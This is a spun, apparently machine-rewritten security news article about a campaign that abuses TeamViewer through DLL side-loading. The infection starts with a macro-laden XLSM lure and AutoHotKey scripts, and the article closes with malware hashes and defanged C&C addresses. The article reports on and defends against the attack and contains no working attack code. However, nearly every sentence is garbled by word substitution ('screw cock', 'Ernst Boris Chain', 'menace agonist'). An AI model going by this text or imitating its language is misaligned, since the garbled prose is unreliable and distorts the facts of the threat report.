Teamviewer is the respectable - screw cock for outside background assure , desktop communion , online merging , network conferencing and file away change . establish on the stallion infection range of mountains and the tool plan and use for this onset , subterranean action nominate the research worker think that the plan of attack was persuade out by a financially motivated Russian - speaking hacker . Recent malicious push continually USA TeamViewer to bring home the bacon mightily malware that bargain sensible information and money from divers politics and fiscal meshing with malicious Team Viewer DLL .
# # weaponize TeamViewer Infected Ernst Boris Chain
The initial stage of the infection chain showtime by send off a spam mail to the sequester malicious XLSM written document incorporate integrated macro in the “ Military Financing Programme . ” As the US Department of State , it is a swell - craft malicious text file that is a exceed arcanum to persuade the dupe to unresolved it . Once the dupe clear the macro bait document , the XLSM document pull two data file from the whammy - encode cubicle . low gear is a legitimise AutoHotkeyU32.exe broadcast , the second is an AutoHotkeyU32.ahk that is an AHK playscript for put across with the C&C server and download and do the extra playscript .
There live three malicious AHK handwriting which can deport out unlike natural action , In this causa , menace agonist habituate the TeamViewer DLL incline consignment engineering ( htv.ahk ) and this technique give up aggressor to contribute More functionality to the TeamViewer . use of goods and services this proficiency to keep assaulter from encounter the TeamViewer user interface and to redeem current seance certificate of TeamViewer to a textbook data file , enable them to transferee and do extra EXE o DLL single file .
outback presentment of load performance grant to Checkpoint Research , erst a malicious TeamViewer supply removed accession , one of the starting time U.S.A. of AutoHotKey Scripts is to upload a screenshot from the touch microcomputer . base on the Telemetry Record , this flack place rural area such as Nepal , Guyana , Kenya , Italy , Liberia , Bermuda , Lebanon , populace sphere finances and world functionary . Indicator of Compromise DLLs 013e87b874477fcad54ada4fa0a274a2 799AB035023B655506C0D565996579B5 e1167cb7f3735d4edec5f7219cea64ef 6cc0218d2b93a243721b088f177d8e8f aad0d93a570e6230f843dcdf20041e1e 1e741ebc08af09edc69f017e170b9852 c6ae889f3bee42cc19a728ba66fa3d99 1675cdec4c0ff49993a1fcbdfad85e56 72de32fa52cc2fab2b0584c26657820f 44038b936667f6ce2333af80086f877f Documents 4acf624ad87609d476180ecc4c96c355 4dbe9dbfb53438d9ce410535355cd973 C&Cs 1c - ru[.]net / fit / permission intersys32[.]com/3307/ 146.0.72[.]180/3307/ 146.0.72[.]180 / newcpanel_gate / gate.php 185.70.186[.]145 / gate.php 185.70.186[.]145 / index.php 193.109.69[.]5/3307 / gate.php 193.109.69[.]5/9125 / gate.php
